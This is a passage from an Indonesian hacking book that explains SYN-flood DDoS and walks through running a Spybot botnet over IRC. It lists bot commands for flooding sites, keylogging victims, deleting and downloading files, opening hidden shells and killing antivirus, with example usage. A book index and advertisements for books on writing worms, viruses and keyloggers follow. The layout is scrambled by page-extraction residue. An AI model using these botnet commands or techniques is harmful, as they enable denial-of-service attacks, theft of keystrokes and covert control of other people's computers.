Spybot juga menyediakan fungsi untuk melakukan serangan


DDoS dengan synflooding. Untuk melakukan synflooding
kepada situs www.jasakom.com, saya memberikan perintah
“Synflooding www.jasakom.com 80 100 10” yang artinya serang
www.jasakom.com dengan mengirimkan paket syn ke port 80 (web
server) sebanyak 10 kali dengan delay selama 100 milidetik.
164
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
Sebuah web server berjalan dengan membuka port 80 dan setiap

BOTNET
kali Anda melakukan browsing ke web server, maka artinya Anda
membuka sebuah koneksi ke port 80.
Seberapapun besarnya sebuah server, tentulah mempunyai batas dan
batas inilah yang akan dimainkan oleh serangan DDoS. Serangan DDoS

N
akan membuat koneksi ke port 80 sebanyak-banyaknya sampai server

DDoS
tersebut terlalu penuh untuk merima koneksi yang lain, akibatnya
adalah situs yang diserang, menjadi tidak bisa diakses oleh pengguna
yang sebenarnya.

N
Synflood adalah serangan dengan memanfaatkan sifat koneksi TCP/IP.

VULNERABILITIES SCANNER
Masih ingat dengan three way handshake ? Untuk memulai sebuah
komunikasi, protokol TCP/IP memulianya dengan jabat tangan 3 kali.
Pertama kali komputer sumber mengirimkan paket SYN, dibalas oleh
target dengan paket SYN/ACK. Terakhir, sumber mengirimkan ACK.
Synflood akan mengirimkan paket SYN kepada target yang dalam contoh
ini adalah web server, seakan-akan ia hendak melakukan koneksi
yang sah, namun sebenarnya paket SYN tersebut telah dimanipulasi
sehingga alamat sumber menjadi berubah.
Web Server kemudian mengirimkan paket balasan SYN/ACK dan
mengalokasikan memory untuk digunakan oleh koneksi ini. Namun

N
karena hacker telah merubah alamat IP sumber, balasan ini lari entah
ke mana sehingga tidak pernah ada balasan.
Web server menunggu, menunggu dan terus menunggu tanpa pernah
mendapatkan paket ACK. Sementara paket SYN yang lainnya terus
terjadi dan Web server terus mengalokasikan memorynya yang
akhirnya membuat memorynya menjadi penuh.
Pada sebagian web server, hal ini bisa saja membuatnya crash,
namun, itu dulu. Sekarang hal tersebut sebagian besarnya sudah bisa
diantisipasi namun menghabiskan resource ? tetap saja terjadi ! karena
itulah sifat dasar dari koneksi TCP/IP.
Beberapa konfigurasi, mencegahnya dengan membuat time out untuk
sebuah koneksi apabila tidak ada jawaban ACK dari sumber, namun
cara ini juga membuat user sah yang mempunyai koneksi yang lambat
tidak bisa mengakses resource yang seharusnya karena mengalami
time out terus menerus.

165
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4

Masih ingat dengan cerita saya tentang situs detik.com yang selalu
N

down setiap kali ada kejadian penting ? Artinya, dengan memiliki


pasukan yang banyak, Anda bisa membuat sebuah situs atau server
VULNERABILITIES SCANNER

down dengan cara apapun. Anda bisa memerintahkan semua bot


membrowse server tersebut sehingga resourcenya menjadi habis dan
berbagai koneksi normal lainnya. Dengan memiliki pasukan yang
banyak, seorang hacker mempunyai power yang besar dan bisa berbuat
apa saja.
N
DDoS
N
BOTNET
N

Gambar 89. Menjalankan keylogger di komputer zombie

Pada layar berikutnya, saya mencoba mencuri ketikan keyboard dari


komputer korban yang telah terinfeksi dengan bot. Caranya adalah
dengan mengetikkan perintah “startkeylogger”.
Setelah keylogger diaktifkan, semua ketikan keyboard yang dilakukan
di komputer korban, akan dikirimkan dan ditampilkan di channel IRC.
Terakhir, saya mematikan fungsi ini dengan memberikan perintah
“stopkeylogger” kepada para bot.

166
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
Fungsi-fungsi yang telah saya bahas ini, hanyalah sebagian kecil dari

BOTNET
fungsi-fungsi yang ada. Berikut adalah fungsi menarik lainnya yang
tersedia :
*ingat bahwa Anda bisa mengganti perintah default ini dengan kata-
kata lain sesuai dengan kehendak Anda melalui file settings.h

N
DDoS
Perintah Contoh dan keterangan

N
Login password Untuk memerintah bot yang diberi
password, Anda harus login terlebih

VULNERABILITIES SCANNER
dahulu dengan perintah ini.
raw [raw command] Mengirimkan perintah-perintah ke
IRC. Anda bisa mempelajari perintah
IRC untuk mengetahuinya lebih lanjut.
(contoh: raw PRIVMSG #spybot1.1 :
hello)
list [path+filter] Melihat file, sama dengan perintah dir.
(contoh: list c:\*.*)
delete [filename] Menghapus file.

N
(contoh: delete c:\windows\netstat.exe)
execute [filename] Menjalankan file atau program.
Sebagai contoh, dengan memberikan
perintah “Execute c:\windows\
system32\notepad.exe”, program
notepad akan dijalanlan di komputer
zombie.
rename [origenamfile] Merubah nama file. (contoh: rename
[newfile] c:\windows\netstat.exe c:\windows\
netstatbackup.bak)
makedir [dirname] Membuat direktory
(contoh: makedir c:\test\ )

167
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
N

startkeylogger Menjalankan fungsi keylogger


di komputer zombie. Apa yang
diketikkan oleh pengguna komputer
VULNERABILITIES SCANNER

zombie akan langsung terlihat di


channel.
stopkeylogger Menghentikan fungsi keylogger
sendkeys [keys] Mensimulasikan ketikan keyboard.
Anda bisa mengirimkan ketikan
keyboard dengan perintah ini. Sebagai
contohnya, jika Anda mengirimkan
perintah “sendkeys zom-zom” maka
tulisan om-zom akan terkirim.
N

Saya tidak mengetahui kenapa huruf


DDoS

pertama-nya hilang namun Anda bisa


mencegahnya dengan menambahkan
spasi di depan karakter yang hendak
N

dikirim dengan mengetikkan ctrl+u


yang akan ditampilkan dalam bentuk
BOTNET

kotak hitam di irc.


keyboardlights Menyalakan lampu keyboard
sebanyak 50 kali (tindakan iseng)
N

info Memberikan informasi tentang


komputer zombie. Sebagai contoh
output yang didapatkan adalah :
Version:spybot1.2c cpu: 1721MHz.
ram: 511MB total, 384MB free 24%
in use os: Windows XP [Service Pack
2] (5.1, build 2600). uptime: 0d 3h
32m. Date: 01:Dec:2006 Time: 14:29:39
Current user: jsk IP:192.168.89.129
Hostname:LAB01.localdomain Windir:
C:\WINDOWS\ Systemdir: C:\
WINDOWS\system32\

168
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
BOTNET
passwords Menampilkan password dialup,
yang hanya berlaku untuk jika sistem
operasi komputer zombie adalah
windows 95 atau 98

N
listprocesses Melihat proses yang sedang berjalan
di komputer zombie. Berikut adalah

DDoS
contoh keluarannya :
listprocesses

N
[System Process]
System

VULNERABILITIES SCANNER
smss.exe
winlogon.exe
services.exe
lsass.exe
...... ..... .(dipotong)

Proses ini bisa Anda lihat dengan cara


yang sama dengan menekan tombol
ctrl+alt+del di komputer Anda.
killprocess [processname] Mematikan proses

N
(contoh: killprocess taskmgr.exe)
reconnect Meminta komputer zombie untuk
disconnect dari irc dan melakukan
koneksi kembali
disconnect [sec.] Meminta agar bot zombie melakukan
disconnect dalam jangka waktu
tertentu. Jika tidak diberikan informasi
berapa lama harus disconnect, maka
secara default adalah 30 menit.
quit Mematikan bot
reboot Mereboot komputer zombie
cd-rom [0/1] Membuka atau menutup cdrom
(catatan: cd-rom 1 = buka cd-rom 0 =
tutup)

169
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 3
N

Httpserver [port] [root-dir] Menjalankan fungsi server web


“contoh: httpserver 81 c:\”. Dengan
SESSION HIJACKING

perintah ini Anda bisa mem-browse


ke alamat IP zombie dan melihat
semua file yang ada di drive C dengan
browser
syn [host] [port] [delay msec.] Melakukan serangan syn
[times]
(contoh: syn 127.0.0.1 80 100 1000)
Threads Menampilkan semua proses yang
N

sedang dijalankan oleh bot. Ketika


saya menjalankan fungsi web
KEYLOGGER

server, keylogger dan fasilitas untuk


mematikan antivirus, hasil yang
ditampilkan akan seperti berikut :
N

0: F/AV Killer
1: HTTP server listining on poort: 90
root dir: c:\
2: Keylogger logging to #jasakom
killthread [number] Mematikan proses. Sebagai contoh,
untuk mematikan proses keylogger
saya bisa menjalankan perintah :
“killthread 2”
Angka 2 didapatkan dari perintah
threads sebelumnya.
get [filename] Mengambil file yang ada dikomputer
zombie
(contoh: get c:\windows\system\
keylogs.txt)
opencmd Menjalankan command pada
komputer zombie, dalam modus
tersembunyi.

170
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 3
N
cmd [command]

KEYLOGGER
Mengirimkan perintah. Misalnya
untuk mengirimkan perintah ke cmd :
cmd netstat –an
scan [start ip address] [port] Melakukan scanning. Contoh:
[delay] [filename]
“scan 127.0.0.1 17300 1 portscan.txt”

N
download [url] [filename] Mendownload file dari internet.

SESSION HIJACKING
Contoh: download http://127.0.0.1/
server.exe c:\server.exe
uninstall Uninstall program bot dari komputer
korban. Perintah ini akan membuat
program bot tidak lagi aktif di
komputer korban namun file bot nya
sendiri tidak dihapus.

171
Jasakom
2

Blank
2 2 2 2 2 2 2 2 2 2 2
Index
cache dns 71
A
Cain & Abel 16, 17, 18, 19, 33, 39,
ACK Storms VIII, 93 42, 43, 44, 45, 46, 48, 49, 52,
53, 55, 67
active hub 8, 9
CAM 25
active sniffing 3
Citibank VII, 39, 41, 129
agobot 159
coax 4, 5
ARP 1, 11, 26, 27, 28, 29, 34, 36,
37, 39, 42, 43, 44, VII, 43, Collision 6
44, 45, 46, 47, 48, 49, 50, 58, Content Addressable Memory 25
59, 60, 67
CSMA/CD VII, 6, 7
Asynchronously 128
D
B
DDoS IX, 133, 150, 152, 153, 154,
Back Orifice 108 156, 157, 158, 164, 165
Bandwidh 5 Dekapsulasi VII, 7, 8
BCA 39, 41, 51, 53, 67 detik 16, 47, 57, 63, 64, 67, 68, 73,
binder 124, 126, 127 79, 139, 144, 145, 150, 152,
153, 154, 166
BNC 4
DHCP 61, 74, 75, 76, VIII, 76, 75, 76,
bookmark 51, 67 77, 78, 79, 80
BOTNET 133, 157, 158 DHCPACK 75
broadcast 5, 9, 25, 26, 29, 31, 43, DHCPDISCOVER 75
75
DHCPOFFER 75, 77
bus 4
DHCPREQUEST 75
C DHCP Spoofing VIII, 74

Cache ARP 43 DNS VIII, 61, 63, 66, 67, 68, 69, 70,
71, 73, 76

173
Jasakom
2 2 2 2 2 2 2 2 2 2 2
DNS Client Resolver Cache 70, 71 google hacking 138
DNS Spoofer 67, 68 GTBot 159
Domain Name System 63 H
dynamic 45, 46, 49, 50, 59, 60
hacker 3, 14, 15, 16, 25, 31, 33, 34,
E 36, 38, 56, 58, 59, 68, 73, 74,
76, 77, 80, 83, 90, 91, 92, 93,
Engarde Systems 95 94, 95, 96, 102, 103, 104,
105, 106, 108, 112, 115, 116,
Enkapsulasi VII, 7
123, 125, 135, 136, 139, 140,
error recovery 85 141, 142, 149, 151, 152, 153,
Ethereal 11, 12, 33, 78 154, 155, 156, 157, 158, 159,
163, 165, 166
Etherflood 32, 33
HACKING IV, VIII, 61, 66
Ethernet VII, 4, 5, 10, 33
hardware keylogger 40, 108, 109,
Exebinder 124 110, 111, 129, 130
F hosts 70, 71, 72, 73
HTTP 16, 21, 65, 66, 105, 170
FBI 107, 151
HTTPS 16, 53, 54, 55, 56, 105
Fearless Keylogger VIII, 118, 119,
121, 122, 123 hub 4, 5, 6, 7, 8, 9, 10, 22, 24, 25,
31, 56, 106
firewall 31, 39, 40, 45, 90, 157
Hunt 94, 95
FKS.exe 119, 120
flooding VII, 30
I
flushdns 73 ICMP 13, 157
G ICQ VII, 16, 18, 19
IDS 3, 11
gateway 42, 44, 45, 46, 47, 48, 49,
50, 76 Initial Sequence Number 87

GFILANguard VIII, 142, 143, 144 internet 16, 39, 40, 42, 45, 51, 56,
74, 106, 107, 109, 135, 144,
GFI LanGuard Scanner 141 145, 151, 152, 161, 162, 171

174
Jasakom
2 2 2 2 2 2 2 2 2 2 2
ipconfig 71, 72, 73 M
IPSec 56, 105
MAC VII, 24, 25, 26, 27, 28, 29, 30,
IRC 73, 158, 160, 161, 163, 166, 31, 32, 34, 35, 36, 37, 42, 43,
167 44, 45, 46, 48, 49, 50, 58, 59
ISN 87, 88 Mafiaboy IX, 150, 151, 152
ISP 40, 57, 63, 70 Man-in-the-middle Attack VII, 34
ISS Internet 141 Manageable 24
J MITM VII, 34, 67

jasakom IV, V, 64, 65, 69, 70, 72, N


136, 140, 160, 164, 170
Nessus Security Scanner 141
Juggernaut 94, 95
Netbus 108
K Nikto 141, 142

Kevin Mitnik 83 nslookup 64

keylogger 40, 106, 107, 108, 109, P


110, 111, 112, 113, 118, 119,
120, 121, 123, 125, 128, 129, passive hub 8, 9
130, 131, 162, 166, 168, 170
passive sniffing 3
KGB Keylogger VIII, 107, 108, 113,
120, 129 phatbot 159

Klikbca VII, 39, 41 Phrack 95

kompas 64, 67, 68 poisoning 58


POP3 VII, 16, 18, 56, 57
L
promiscuous mode 10, 11, 12
Lawrence Berkeley National Labora- protocol analyzer 11
tory, Network Research Group
60 R
Linux 43
ReCODED VI, 65
linux 15, 78, 94, 95

175
Jasakom
2 2 2 2 2 2 2 2 2 2 2
reliability 85 statik 58
Retina VIII, 141, 146, 147, 148 Stealth Keylogger 107, 108
RJ-11 5 Sub Seven 108
RJ-45 5, 106 switch 4, 5, 6, 8, 9, 11, 22, 23, 24, 25,
27, 28, 29, 30, 31, 32, 33, 34,
routing 38, 47, 48
35, 41, 56, 58, 96, 99, 105, 106
RUNDLL 73
synchronize sequence numbers 87
RUNDLL32 73
Synchronously 128
S Synflood 165

Sara 141 Synflooding 164

sdbot 159 T
sequence number 85, 86, 88, 89,
T-Sight VIII, 94, 95, 97, 100, 101,
91, 92, 93, 94, 104
102, 103, 104
SESSION HIJACKING 81
Task Manager 114, 120
SMB 56, 105
TCP VIII, 13, 14, 15, 39, 71, 76, 84,
SMTP VII, 16, 56, 57 85, 86, 87, 88, 90, 91, 92, 93,
94, 105, 143, 144, 145, 165
Sniffer 3, 17, 19, 48
tcpdump 11, 22
sniffing 3, 4, 5, 6, 8, 10, 11, 12, 13,
14, 16, 17, 19, 22, 23, 29, TELNET VII, 16
34, 41, 42, 48, 55, 56
TFN 157
Snort 11
TFN2K 157
Spoofer 67, 68
Thinnet 4
Spoofing VIII, 67, 74
Three Way Handshake VIII, 86
SPYBOT IX, 159
Track Down 83
ssh 105
Tribal Flood Network 157
star 5
Trinity 157
static 59, 60
Trinoo 157

176
Jasakom
2 2 2 2 2 2 2 2 2 2 2
trojan 40, 107, 108, 119, 123, 125 Z
Tsutomo Shimamura 83, 84
zombie 154, 155, 156, 157, 158,
TTY-Wacher 94, 95 159, 163, 166, 167, 168,
169, 170
U

UDP 13, 143, 144


Unmanaged 24
UTP 4, 5

Virtual Keyboard 129


virus 11, 22, 70, 89, 108, 119, 123,
126, 128, 130
VULNERABILITIES SCANNER
133

windowing 89
Windows 2003 49, 70, 71, 78, 79, 80,
89, 91, 92, 93, 94, 98, 122
windows 98 73
Windows XP 32, 71, 97, 168
Windump 11
WinTrinoo 157
WireShark 11, 12, 22

yersinia 77, 78, 79

177
Jasakom
Blank
HTTP://WWW.JASAKOM.COM/PENERBITAN
. Computer Worm 1 & Worm 2
Secret of Underground Coding
Penulis : Achmad Darmal
Tentu Anda sudah sering mendengar worm
lokal seperti worm Pesin, worm Kangen dan
worm RontokBro. Anda juga tentu mengetahui
bahwa worm-worm tersebut dibuat oleh orang
Indonesia tapi tahukah Anda bagaimana cara
membuatnya ? Teknik apa saja yang digu-
nakan ? Apa saja yang mampu dilakukan oleh
sebuah worm ? Bagaimana cara kerjanya ?
Buku ini tidak hanya menjelaskan kepada para pembaca apa
itu sesungguhnya worm komputer namun juga bagaimana
membuat sebuah worm secara bertahap serta berbagai teknik rahasia dibelakangnya.
Melalui Worm WSar.1 hingga WSar.9, buku ini akan mengungkap teknik dasar dan be-
berapa teknik yang selama ini dirahasiakan para worm writer ataupun virus writer, terma-
suk teknik polymorphic, droping file, watcher, shell spawning,
enkripsi, kompresi hingga teknik comparison yang akan di-
aplikasikan untuk melumpuhkan suatu antivirus.

“Pemrograman Virus dan Spyware : Uncensored”


Penulis : Wardana
Pernahkah halaman home page browser Anda diganti
tanpa Anda sadari dan selalu membuka situs porno
secara otomatis ? Itulah salah satu “kerjaan” Spy-
ware!
Pernahkah password ICQ, Internet Banking, mIRC,
Friendster, Email, dll Anda dicuri tanpa Anda sadari ?
Itulah salah satu “’kerjaan’ Keylogger !
Pernahkan data Anda tiba-tiba hilang atau rusak dan
komputer Anda bertingkah laku aneh ? itulah salah satu
‘kerjaan’ Virus.
Buku ini akan memperlihatkan kepada Anda bagaimana Spyware, Virus dan Keylog-
ger bisa dibuat dengan bahasa tingkat tinggi Visual Basic. Benar, Visual Basic yang
dikenal sebagai bahasa tingkat tinggi untuk pemrograman database dan program util-
ity bisa digunakan untuk pembuatan spyware, virus maupun keylogger.
Perkembangan Virus lokal yang semakin mengganas seperti dengan munculnya bron-
tok yang dibuat dengan visual basic 6 telah membuktikan keampuhan Visual Basic.
Kini tiba saatnya bagi Anda untuk ikut mengetahui rahasia cara pembuatannya.
HTTP://WWW.JASAKOM.COM/PENERBITAN

“Seni Internet Hacking ReCODED: Uncensored”.


Penulis : S”to
Buku ini memperlihatkan sebaris dosa dari seorang
pengembang aplikasi. Dosa yang menyebabkan seorang
hacker mampu mengambil alih sebuah komputer bahkan
sebuah jaringan tanpa perlu menyentuhnya sama sekali.
Jika Anda pernah berfikir bahwa firewall mampu mencegahnya,
Jika Anda pernah berfikir bahwa update patch terbaru mampu
menghalanginya, Jika Anda pernah berfikir bahwa hanya orang
jenius yang mampu melakukannya, maka Anda salah besar !
Buku ini menunjukkan kepada Anda bagaimana sebuah aplikasi
dibuat dan bagaimana aplikasi tersebut bisa diambil alih dengan mudah
tanpa perlu menggunakan tools yang canggih.
Dengan adanya CD yang berisi Video, Source Code dan Program yang dibutuhkan, topik
yang biasanya selalu dianggap susah menjadi mudah untuk diikuti dan dipelajari oleh
siapapun. Kuasai ilmu hacker ini sebelum hacker menguasai Anda !

* Anda akan melihat pembuatan suatu aplikasi dengan bahasa ASP dan
PHP dan bagaimana aplikasi tersebut bisa di ambil alih oleh Hacker !
BEST SELLER !!

“Fedora Core 4 : Red Hat Linux”


Penulis : S’to
Merupakan buku linux yang memberikan dasar-
dasar yang diperlukan untuk memahami linux lebih
lanjut.
Buku yang unik dengan memberikan pengajaran
yang menandai sebuah era baru dimana anda
akan belajar dengan text, audio dan video.
Buku ini dijamin akan sangat berguna bagi pemu-
la sehingga bisa mempelajari linux melalui “jalan yang benar”. Kami
menjamin bukan hanya sekedar kata-kata namun buku ini memberikan
jaminan “Uang Kembali” sekiranya ternyata tidak bermutu !
Hanya kami yang berani memberikan Jaminan Sebenarnya !
BEST SELLER !!
HTTP://WWW.JASAKOM.COM/PENERBITAN

“Hack Attack : Konsep, Penerapan dan Pencegahan”


Penulis : Harianto Ruslim, CEH
Buku ini membantu Anda membuka wawasan mengenai apa se-
benarnya computing security atau keamanan komputer.
Oleh sebab itu buku ini bisa dimiliki dan dibaca oleh semua peng-
guna komputer dan tidak sebatas orang IT karena membahas
berbagai aspek yang bisa merugikan seperti pencurian ID dan
password dari nasabah bank.
Buku ini juga cocok baik bagi pemula yang ingin mengetahui
lebih lanjut mengenai security ataupun bagi mereka yang sudah
berkecimpung di dunia security.
Penulis mencoba menampilkan segala sesuatu yang diketahuinya selama bergelut di
dunia security dan berdasarkan pengalaman yang didapatkan selama menjadi konsultan

“Seni Teknik Hacking 1 :Uncensored”


Penulis : S’to
Merupakan buku yang berisi kumpulan
teknik yang sering digunakan di dalam du-
nia para hacker. Ketika kehidupan sudah
tidak bisa dipisahkan dari perkembangan
teknologi komputer, maka pilihannya
hanya dua. Memanfaatkan dengan me-
mahaminya atau dimanfaatkan karena
tidak memahaminya dan menjadi korban
dari teknologi itu sendiri.
Hacker yang sering diidentikkan dengan kejahatan hanyalah orang-
orang yang memiliki pengertian dan pemahanan yang lebih daripada
korbannya. Buku ini mengungkapkan kepada Anda berbagai teknik
yang sering digunakan oleh para Hacker dalam melalukan berbagai
aksi yang sering dianggap tidak mungkin. Buku ini juga sengaja disu-
sun untuk memperlihatkan kepada Anda bahwa seorang Hacker tidak
harus jago atau bahkan menguasai bahasa programming yang rumit.
Kumpulan teknik yang disusun dengan detail ini memberikan anda
pengertian tentang konsep dan teknik yang harus Anda kuasai agar
tidak menjadi korban teknologi.
BEST SELLER !! (cetakan ke-6)
HTTP://WWW.JASAKOM.COM/PENERBITAN

“Seni Internet Hacking


Uncensored”
Penulis : S’to
Merupakan buku Best Seller
yang terjual lebih dari 10.000
eksemplar hanya dalam wak-
tu 5 bulan semenjak diterbit-
kan oleh Jasakom bulan juni
2004.
Pada cetakan ke-4, telah ter-
jadi penambahan materi kare-
na banyaknya permintaan dan
pertanyaan seputar hacking ke KPU dan juga topik lainnya. Untuk para
pembeli buku edisi lama, anda tidak perlu lagi membeli buku yang baru
ini. Tambahan 18 halaman ini bisa anda dapatkan secara gratis den-
gan mendownloadnya melalui situs ini.
Kini buku legendaris ini telah mencapai cetakan ke-11 yang dilakukan
pada bulan Oktober 2006
BEST SELLER !!

Tertarik dengan buku-buku terbitan Jasakom ? Silahkan hubungi


kami di :

Web : http://www.jasakom.com/penerbitan
email : admin@jasakom.com
Fax : 021-56957634
HP : 0888-1911091

Anda mungkin juga menyukai